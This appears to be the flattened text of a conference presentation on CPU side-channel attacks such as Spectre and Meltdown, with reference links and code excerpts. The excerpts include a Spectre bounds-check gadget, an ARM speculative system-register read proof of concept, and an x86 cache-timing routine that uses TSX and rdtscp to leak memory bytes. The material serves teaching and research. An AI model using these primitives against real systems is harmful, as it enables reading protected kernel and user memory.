/Сергей Смитиенко/

www.nocservice.biz

Shadow Walker (2005) https://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf MoRE Shadow Walker: TLB-splitting on Modern x86 2014 https://www.youtube.com/watch?v=yrFqaF-gd0g

Hello From the Other Side SSH Over Robust Cache Covert Channels in the Cloud - 2013 https://www.youtube.com/watch?v=a9sGk7FtnYk

ARMageddon: How Your Smartphone CPU Breaks Software-Level Security and Privacy - 2016 https://www.youtube.com/watch?v=9KsnFWejpQg

https://en.wikichip.org/wiki/intel/microarchitectures/skylake_(client)

mov rax, 1 add rax, 1 mov [1], rax mov rax, 2 add rax, 2 mov [2],rax

if (x < array1_size) y = array2[array1[x] * 256];

jmp eax jmp [eax] jmp dword ptr [0x01dec0de] ret

https://github.com/lgeek/spec_poc_arm/ // void spec_read(void *probe_buf, void *miss_buf, int bit); .global spec_read .func spec_read: LDR X1, [X1] NOP // replaced with MRS X3, SYSTEM_REG LSR X3, X3, X2 AND X3, X3, #1 ADD X0, X0, X3, LSL #12 LDR X0, [X0] RET .endfunc https://github.com/lgeek/spec_poc_arm/

$ ./dump_sys_regs ACTLR_EL1 : 0x0 ACTLR_EL2 : 0x73 ... TTBR0_EL1 : 0xf89f0000d4454000 TTBR0_EL2 : 0x0 TTBR0_EL3 : 0x30010b00 TTBR1_EL1 : 0x8133f000 TTBR1_EL2 : 0x0 VDISR_EL2 : 0x0 VSESR_EL2 : 0x0 VTCR_EL2 : 0x80000000 VTTBR_EL2 : 0x0 AFSR0_EL12 : 0x0 AFSR1_EL12 : 0x0 AMAIR_EL12 : 0x0 CNTFRQ_EL0 : 0x1dcd650 CNTHCTL_EL2 : 0x3 CNTHP_CTL_EL2 : 0x0 CNTHP_CVAL_EL2 : 0x0 CNTHP_TVAL_EL2 : 0x65a29ee7 (dynamic?) CNTHV_CTL_EL2 : 0x0 CNTHV_CVAL_EL2 : 0x0 CNTHV_TVAL_EL2 : 0x0 CNTKCTL_EL1 : 0xc6 CNTKCTL_EL12 : 0x0 ...

asm_test_sig(unsigned char* target) { register int mix_i,i,j; register unsigned x; unsigned hit[256]; unsigned long time_read; unsigned junk; i = pread(fd, buf, sizeof(buf), 0); for (i = 0; i < 256; i++) hit[i] = 0; j = 100; do { for (i = 0; i < 256; i++) _mm_clflush( & test_arr[i*PSIZE] ); _asm_spec_read(target, test_arr); for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; x = mix_i * PSIZE; time_read = _asm_time_read(&test_arr[x]); if (time_read < 100) { hit[mix_i] ++; } j--; } while (j > 0); ... ; rdi : base pointer _asm_time_read: push rbx xor rbx, rbx rdtscp ; edx = hi, eax = lo, ecx = junk mov ebx, edx shl rbx, 32 mov ebx, eax ; rbx = timestamp counter mov eax, [rdi] rdtscp shl rdx, 32 xor edx, edx or rax, rdx ; rax = timestamp counter sub rax, rbx pop rbx ret ; rsi : test_arr _asm_spec_read: xor rax, rax xor rcx, rcx xbegin ABORT_SPEC_READ spec_retry: %rep 300 add rax, 0x141 %endrep jz spec_retry movzx eax, byte [rdi] shl eax, 12 movzx ebx, byte [rsi + rax + 1] xend ABORT_SPEC_READ:

Intel® 64 and IA-32 Architectures Software Developer’s Manual https://software.intel.com/sites/default/files/managed/39/c5/325462-sdm-vol-1-2abcd-3abcd.pdf Intel® 64 and IA-32 Architectures Software Developer’s Manual https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf Intel® 64 and IA-32 Architectures Optimization Reference Manual https://cmaurice.fr/ Clémentine Maurice https://developer.arm.com/support/security-update Arm Processor Security Update https://github.com/IAIK/meltdown Meltdown Proof-of-Concept https://github.com/speed47/spectre-meltdown-checker Spectre & Meltdown Checker https://github.com/genua/meltdown Meltdown & Spectre PoC for OpenBSD https://github.com/lgeek/spec_poc_arm/ ARM Meltdown PoC https://docs.google.com/presentation/d/1xZPaeh7zQ-u_d9zVLxsxcPtwKcYfXTp1RCjMojivhdI/ - This presentation.

skype: sergey.smitienko, FB, LinkedIn